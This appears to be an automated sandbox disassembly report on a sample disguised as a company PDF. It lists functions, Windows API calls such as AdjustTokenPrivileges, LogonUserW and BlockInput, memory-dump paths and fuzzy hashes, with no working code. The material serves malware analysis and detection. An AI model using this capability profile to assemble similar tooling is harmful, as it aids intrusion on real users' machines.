                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1922334811-0
                                                                                                                      • Opcode ID: efc51609571eabc7bcae1f3897062b64d9e2983334b9741f208f3cd3a888094c
                                                                                                                      • Instruction ID: 21c4eef9fffebec6ec1f93d6c9c820740115db1d508ddfbe20a5d2ec17d809a7
                                                                                                                      • Opcode Fuzzy Hash: efc51609571eabc7bcae1f3897062b64d9e2983334b9741f208f3cd3a888094c
                                                                                                                      • Instruction Fuzzy Hash: 20118FB1514209AFD728AF54DC89D6BB7F8EB44750B24C62EF45693241EB34BC408A64
                                                                                                                      Function 007B4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B404B
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 007B4088
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007B4091
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 33631002-0
                                                                                                                      • Opcode ID: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                                                                                                                      • Instruction ID: e1e29e00bd50071bd305efb62c25eb8d26e5a39d7312f4e197740e7a71c7f5a1
                                                                                                                      • Opcode Fuzzy Hash: 9ba6f1eec7e05a5a646e67da6fcdf66bc319d4a04c69acd607943e3bd421a6cc
                                                                                                                      • Instruction Fuzzy Hash: C91170B2901228BEE7109BE8DC44FAFBBBCEB08710F004656FA05E7191C2785A0487A1
                                                                                                                      Function 007B4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B4C2C
                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007B4C43
                                                                                                                      • FreeSid.ADVAPI32(?), ref: 007B4C53
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429775523-0
                                                                                                                      • Opcode ID: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                                                                                                                      • Instruction ID: 5b3ae2fb1a36a958ff301b05f6ba9524a58c0d732b92dca7c456c439a8f4c301
                                                                                                                      • Opcode Fuzzy Hash: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                                                                                                                      • Instruction Fuzzy Hash: B7F03C75A11208BBDB04DFE09C89AADBBB8EB08201F408469E502E2281D6745A048B54
                                                                                                                      Function 0075E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 01ca7a517842b089b4227e516e36a975bdf8c39b3ce9c7407339b6ba8f2aa83c
                                                                                                                      • Instruction ID: 8f4bbfc3af5b809020024e5dd54899dc5e60e27ee76123f58f7ebcbe1d4df031
                                                                                                                      • Opcode Fuzzy Hash: 01ca7a517842b089b4227e516e36a975bdf8c39b3ce9c7407339b6ba8f2aa83c
                                                                                                                      • Instruction Fuzzy Hash: 8B229E70A00219DFDB28DF58C484AEEB7F1FF04311F148469ED569B341E7B8AA89CB91
                                                                                                                      Function 007BC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 007BC966
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007BC996
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: a959a34d74e19540882cbf2d1a593e93d30a6dbbea941f9c45b7661edbf14e2d
                                                                                                                      • Instruction ID: f3512af76273ee4b9ce347621bb80cf941ba3380a97b310e99903a0afefe3b05
                                                                                                                      • Opcode Fuzzy Hash: a959a34d74e19540882cbf2d1a593e93d30a6dbbea941f9c45b7661edbf14e2d
                                                                                                                      • Instruction Fuzzy Hash: 8A1170316002009FDB109F29C849A6AB7E9EF84321F04C51EF9A6D7291DB74A804CB91
                                                                                                                      Function 007BA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA302
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007C977D,?,007DFB84,?), ref: 007BA314
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: c29ffc489cbf899c13e3ef571660023ebb0a952ca191265fa14e545cf6da576a
                                                                                                                      • Instruction ID: 47288ad3318cf9b3c08248321345b114941cb7cf1307b7350ee4ca922a5f1580
                                                                                                                      • Opcode Fuzzy Hash: c29ffc489cbf899c13e3ef571660023ebb0a952ca191265fa14e545cf6da576a
                                                                                                                      • Instruction Fuzzy Hash: BBF0E23154522DFBDB20AFA4CC48FEA776DBF08361F008166F809D3180D6349900CBA1
                                                                                                                      Function 007A8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                                                                                                                      • CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: 398bd679888acdbe6dd2b76d12ff5855b366368b60803a139519f04fefe6bd9c
                                                                                                                      • Instruction ID: 9948efb9c09789caa1976f2674ceaa6bb6c3a757ee74393f2941002b765b6e7d
                                                                                                                      • Opcode Fuzzy Hash: 398bd679888acdbe6dd2b76d12ff5855b366368b60803a139519f04fefe6bd9c
                                                                                                                      • Instruction Fuzzy Hash: 8EE0B676011610EEEB252B64ED09D777BE9EB04394724C92AF49A80470DB66AC90DB10
                                                                                                                      Function 0077A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00778F97,?,?,?,00000001), ref: 0077A39A
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0077A3A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                                                                                                                      • Instruction ID: 723b5d1694736db26958cb6d26c585ab0e301c97f4adf93a1d29c4041af5661e
                                                                                                                      • Opcode Fuzzy Hash: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                                                                                                                      • Instruction Fuzzy Hash: 3FB09231055208ABCA002B95EC09B883F78EB44AA2F41C022F60E84060CB6654508A99
                                                                                                                      Function 0075E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Variable must be of type 'Object'., xrefs: 0079428C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                      • API String ID: 0-109567571
                                                                                                                      • Opcode ID: 7983a04791f062a504dd63720acc624099ff301d032560f9c3a11717cc97eb12
                                                                                                                      • Instruction ID: 95a9f267e6a296420bc566d535ca4f98b5d62b42c2a166042859ec89a7b22fa5
                                                                                                                      • Opcode Fuzzy Hash: 7983a04791f062a504dd63720acc624099ff301d032560f9c3a11717cc97eb12
                                                                                                                      • Instruction Fuzzy Hash: A0A27D74A04205CBDB28CF58C484AEDB7B1FF58301F648069ED16AB351D7B9EE4ACB91
                                                                                                                      Function 0077F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                                                                                                                      • Instruction ID: 99430774f6c5e995d254604dba2c416c5fe82d8652e4ae1db7b4e3e3cf35e405
                                                                                                                      • Opcode Fuzzy Hash: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                                                                                                                      • Instruction Fuzzy Hash: 80324662D2AF814DDB279634DD72335A248AFBB3C4F15D737E819B99A6EB2CC4834104
                                                                                                                      Function 0078267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                                                                                                                      • Instruction ID: 51c7d6bf859f76333ce1ebde78032a14419ffb75d0a0577cdea1f6bfbcbf912c
                                                                                                                      • Opcode Fuzzy Hash: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                                                                                                                      • Instruction Fuzzy Hash: A1B10120D2AF814DD723A6398871336BB4CAFBB2C5F52D71BFC1678D62EB2595834241
                                                                                                                      Function 007B8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __time64.LIBCMT ref: 007B8B25
                                                                                                                        • Part of subcall function 0077543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B91F8,00000000,?,?,?,?,007B93A9,00000000,?), ref: 00775443
                                                                                                                        • Part of subcall function 0077543A: __aulldiv.LIBCMT ref: 00775463
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2893107130-0
                                                                                                                      • Opcode ID: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                                                                                                                      • Instruction ID: a4f51b083b13fb00dd3338a3dbafc2a415327dd27c9d9538c28be5aef3b48c7c
                                                                                                                      • Opcode Fuzzy Hash: e79040d2bce5b1761fa4c36e41579a66b86743150fa788b75e92b73ea0858e39
                                                                                                                      • Instruction Fuzzy Hash: CC21A272625510CBC729CF39D441B92B3E5EFA5311B288E6CD1E5CB2D0CA74B945CB94
                                                                                                                      Function 007C41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 007C4218
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                                                                                                                      • Instruction ID: f25e12a49d3109e4e4794ddd70f5f8456b82bf89a5164d1b0120c00e55cec97e
                                                                                                                      • Opcode Fuzzy Hash: f2d19b52add27c9c65f2106098ce6dc96adae0e09c05748b6fb3bf1eb1f6fb40
                                                                                                                      • Instruction Fuzzy Hash: 8CE01A312402149FC710AF69D845E9AB7E8AF94761F00802AFD4AD7252DAB8EC448BA0
                                                                                                                      Function 007B4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007B4F18
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: mouse_event
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2434400541-0
                                                                                                                      • Opcode ID: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                                                                                                                      • Instruction ID: 5e92acceb992b5832d6c9aae0b6e0c2f5411d50a0ad1bc1f4f723b803e2f2196
                                                                                                                      • Opcode Fuzzy Hash: e4e84eb0d5e2061aca56d05e2d10f57b55c52ec0814ad376cdaafc97dd3dc262
                                                                                                                      • Instruction Fuzzy Hash: 11D09EB41646057DFC184F20AC1FFF61219E340791F9C99897202975C398EDA850A035
                                                                                                                      Function 007A8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007A88D1), ref: 007A8CB3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                                      • Instruction ID: 14337a7d297767fe570a9c8c1a36846ee17671748f66915a7136190f25b3d144
                                                                                                                      • Opcode Fuzzy Hash: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                                      • Instruction Fuzzy Hash: 63D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE16D61A1C775D935AB60
                                                                                                                      Function 00792230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00792242
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2645101109-0
                                                                                                                      • Opcode ID: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                                                                                                                      • Instruction ID: 1241e8f3589548e57956a96e004e33970ba1c00c6555140319aa5e2dcd4dbb7d
                                                                                                                      • Opcode Fuzzy Hash: f8ce815924d80b867ffc1b7a6d0ffa7794c62fada4c068369315da917d9a2a03
                                                                                                                      • Instruction Fuzzy Hash: DEC04CF1801109DBDB05DB90D988DFE77BCAB04304F104056E142F2100D7789B448A71
                                                                                                                      Function 0077A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0077A36A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
